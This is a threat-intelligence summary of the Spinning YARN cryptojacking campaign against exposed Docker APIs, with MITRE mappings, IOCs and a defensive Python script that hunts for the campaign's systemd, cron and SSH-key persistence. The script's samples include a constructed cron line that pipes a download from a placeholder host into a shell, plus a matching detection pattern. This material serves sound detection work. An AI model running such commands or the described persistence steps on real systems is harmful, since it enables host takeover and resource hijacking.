Attackers deploying new tactics in campaign targeting exposed Docker APIs | Datadog Security Labs

Datadog Security Labs details a renewed Spinning YARN cryptojacking campaign targeting publicly exposed Docker Engine endpoints, introducing new payloads and persistence methods. The operation includes chkstart, exeremo, and vurl, expands with Go-based components, and relies on systemd and SSH-based techniques to maintain access and mine cryptocurrency. #SpinningYARN #DockerEngine #chkstart #exeremo #vurl #systemd #ExecStartPost #SSH #XMRig #DatadogSecurityLabs

Keypoints

  • The attackers behind Spinning YARN target publicly exposed Docker Engine hosts for initial access via the Docker API (port 2375).
  • The campaign introduces new payloads: chkstart (remote access), exeremo (lateral movement via SSH), and vurl (Go-based downloader).
  • A unique persistence mechanism is used by modifying existing systemd services and inserting ExecStartPost commands to execute malicious actions.
  • Initial access includes spawning an Alpine container that binds the host root and using chroot to pivot to the host filesystem.
  • The attackers deploy two downloader components named vurl; one shell-script-based and one Go-based binary with hardcoded C2 domains and a zzhbot user agent requirement.
  • Exeremo performs SSH-focused lateral movement, collecting usernames, hosts, and private keys to spread to additional SSH servers and launch s.sh to install further tools.
  • The campaign ultimately deploys an XMRig-based miner (top) to hijack computing resources, with mining pools and infrastructure referenced in the IOCs.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The campaign begins by targeting Docker API endpoints exposed on the internet. Quote: ‘Datadog Security Researchers recently encountered a new campaign that targets Docker API endpoints publicly exposed without authentication…’
  • [T1105] Ingress Tool Transfer – The downloader payloads are fetched from attacker infrastructure. Quote: ‘downloadFile function is used to download the previously-mentioned tar archive, m.tar — containing additional payloads — from the new array of hardcoded URLs.’
  • [T1543.003] Create or Modify Systemd Service – Persistence is achieved by modifying unit files and inserting ExecStartPost to execute a payload. Quote: ‘The malware abuses this feature by inserting the line ExecStartPost=/var/tmp/.222/top into the unit file.’
  • [T1053.003] Cron – Persistent download/execution is scheduled via cron entries in /etc/crontab and /etc/cron.d/zzh. Quote: ‘cron job is saved to /etc/crontab and /etc/cron.d/zzh.’
  • [T1021.004] SSH – Lateral Movement – Exeremo uses harvested SSH credentials and keys to spread to adjacent hosts. Quote: ‘a lateral movement tool, used to propagate the malware via SSH.’
  • [T1496] Resource Hijacking – The top binary is a modified XMRig miner used to hijack host resources for cryptocurrency mining. Quote: ‘the malware uses it to mine the XMRig cryptocurrency.’
  • [T1556.004] SSH Authorized Keys – Attacker-provided SSH keys are installed to enable backdoor access. Quote: ‘The malware then proceeds to write an attacker-controlled key to /root/.ssh/authorized_keys and /root/.ssh/.ssh/zzhkeys.’
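The three persistence techniques listed above (an injected ExecStartPost= line in a systemd unit, cron entries in /etc/crontab and /etc/cron.d, and an attacker key in root's authorized_keys) all leave plain-text artefacts that a defender can sweep for. The script below is an added example written for this summary; it is not code from Datadog Security Labs or from the report. The sample unit, cron and authorized_keys text is constructed, the placeholder domain b.example.invalid stands in for the real download host, and the "suspicious path" heuristic (binaries run from temp or hidden dot-directories, modelled on the reported /var/tmp/.222/top) is an assumption of this example rather than something the report prescribes.

```python
"""Hunt for the persistence artefacts named in the summary above: ExecStartPost=
lines injected into systemd units, cron entries that pull or run payloads, and
keys in root's authorized_keys that are not on an allow-list. Sample inputs are
constructed for this example; scan_host() applies the same checks to a live box."""
import base64
import hashlib
import re
from pathlib import Path

# Assumption of this example: executables launched from temp directories or from
# hidden dot-directories (the report names /var/tmp/.222/top) are suspicious.
SUSPICIOUS_PATH = re.compile(r"^/(?:var/tmp|tmp|dev/shm)/|/\.[^/]+/")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")


def find_execstartpost(unit_text):
    """Return ExecStartPost= commands whose executable lives in a suspicious path."""
    hits = []
    for line in unit_text.splitlines():
        line = line.strip()
        if not line.startswith("ExecStartPost="):
            continue
        cmd = line.split("=", 1)[1].strip()
        # systemd allows prefix characters such as '-', '+' or '!' before the path
        exe = cmd.lstrip("-+!@:").split()[0] if cmd else ""
        if SUSPICIOUS_PATH.search(exe):
            hits.append(cmd)
    return hits


def find_cron_entries(cron_text):
    """Return cron lines that run from a suspicious path or pipe a download into a shell."""
    return [
        s for s in (raw.strip() for raw in cron_text.splitlines())
        if s and not s.startswith("#")
        and (SUSPICIOUS_PATH.search(s) or PIPE_TO_SHELL.search(s))
    ]


def key_fingerprint(key_b64):
    """OpenSSH-style SHA256 fingerprint of a base64-encoded key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def find_unknown_keys(authorized_keys_text, allowed_fingerprints):
    """Return (fingerprint, comment) for every key whose fingerprint is not allow-listed."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        parts = line.strip().split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        # A line may start with options (e.g. no-pty); locate the key-type token first
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        fp = key_fingerprint(parts[idx + 1])
        if fp not in allowed_fingerprints:
            unknown.append((fp, " ".join(parts[idx + 2:])))
    return unknown


# --- constructed samples (not taken from the report) --------------------------
SAMPLE_UNIT = """[Unit]
Description=amazon-ssm-agent
[Service]
ExecStart=/usr/bin/amazon-ssm-agent
ExecStartPost=/var/tmp/.222/top
ExecStartPost=-/usr/bin/logger started
"""
SAMPLE_CRON = """# constructed /etc/cron.d lookalike; b.example.invalid is a placeholder host
*/30 * * * * root curl -fsSL http://b.example.invalid/ar.sh | sh
0 * * * * root /usr/lib/apt/apt.helper
"""
ADMIN_KEY = base64.b64encode(b"constructed admin key blob").decode()
ROGUE_KEY = base64.b64encode(b"constructed attacker key blob").decode()
SAMPLE_AUTH_KEYS = (
    f"ssh-ed25519 {ADMIN_KEY} admin@bastion\n"
    f"no-pty ssh-rsa {ROGUE_KEY} zzh\n"
)
ALLOWED = {key_fingerprint(ADMIN_KEY)}


def scan_host(allowed_fingerprints):
    """Run the checks against a live system (needs root); returns a dict of findings."""
    findings = {"units": {}, "cron": {}, "keys": []}
    unit_files = [p for d in ("/etc/systemd/system", "/usr/lib/systemd/system")
                  for p in Path(d).glob("*.service")]
    cron_files = [Path("/etc/crontab")] + sorted(Path("/etc/cron.d").glob("*"))
    for path, check, bucket in [(p, find_execstartpost, "units") for p in unit_files] + \
                               [(p, find_cron_entries, "cron") for p in cron_files]:
        try:
            hits = check(path.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            findings[bucket][str(path)] = hits
    try:
        keys_text = Path("/root/.ssh/authorized_keys").read_text()
        findings["keys"] = find_unknown_keys(keys_text, allowed_fingerprints)
    except OSError:
        pass
    return findings


if __name__ == "__main__":
    print("unit hits:", find_execstartpost(SAMPLE_UNIT))
    print("cron hits:", find_cron_entries(SAMPLE_CRON))
    print("unknown keys:", find_unknown_keys(SAMPLE_AUTH_KEYS, ALLOWED))
```

Fingerprints rather than raw key strings are compared so the allow-list can be built from `ssh-keygen -lf` output on a known-good host; a key line that carries options such as no-pty is still matched because the parser skips to the key-type token before decoding.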

Indicators of Compromise

  • [IP Address] 64.19.222.131, 206.189.204.54, 107.189.7.84, 194.36.190.118 – public IPs used by campaign infrastructure.
  • [Domains/URLs] m.9-9-8.com, m.9-9-11.com, m.9-9-12.com, m.9-9-13.com, m.9-9-14.com, m.9-9-15.com, m.9-9-16.com, m.9-9-17.com, m.9-9-18.com, m.9-9-19.com, b.9-9-11.com, b.9-9-11.com/brysj/m/m.tar, b.9-9-11.com/brysj/d/ar.sh, b.9-9-11.com/brysj/d/ai.sh, b.9-9-12.com
  • [SHA256] 51de345f677f46595fc3bd747bfb61bc9ff130adcbec48f3401f8057c8702af9 (1.0.4.tar.gz), 12481d3fbcee0ed5aa8a9c8bc1aeb71bf9439cbddf68e8cd275c2a90b26ec0ad (ar.sh), 852a577b227aa856399ae836d9db15eee38a4f62301a8590f80a009ec29dad8a (b.sh), 2063e682e631fc28d77b50b32494edf2cf37bcc1e85c6d0302b34fa2e30aa52f (chkstart), 048a1fe62bcd51cbf91128012dc1c15f25b17133d241c25d6717c3caf766c1ec (exeremo), 7044f839aecd91bc5e4deac327d0b41fdae9a8238a9b64510ff336e49ed92e08 (fkoths), 0d508268b3f6d3b5396d5d182e546e59311af1d4ebe03a7728e2fd2a212c008b (m.tar), b6ddd29b0f74c8cfbe429320e7f83427f8db67e829164b67b73ebbdcd75d162d (p.tar), 32dfb086e6719c20666f151d17a3fbfcbccf559d0a8f1b2b888175f1a4d8f8a8 (s.sh), f3925aad20636a17be343ff473e6acb86345bc82c6611daa2154e24cd5e670e8 (sd), dcff5f9e748c915aeefce08991d924197aff7f2a0affda00bfb45cfa1919b641 (top), fdda14d3bc993960991ac6c95964514444e730f04b76d607df6e59087761648d (vurl), f53b8f70f6aeb478781e17ffd16a0fbbe5a5a08b4c4c0597091bc3407794ed1b (zgrab).
  • [Filepath] /usr/bin/vurl, /etc/crontab, /etc/cron.d/zzh, /var/tmp/.222, /root/.ssh/authorized_keys, /root/.ssh/.ssh/zzhkeys, /usr/lib/systemd/system/amazon-ssm-agent.service (modified), /var/tmp/.222/top (persistence)
  • [Filename] 1.0.4.tar.gz, ar.sh, b.sh, chkstart, exeremo, fkoths, m.tar, p.tar, s.sh, sd, top, vurl, zgrab

Read more: https://securitylabs.datadoghq.com/articles/attackers-deploying-new-tactics-in-campaign-targeting-exposed-docker-apis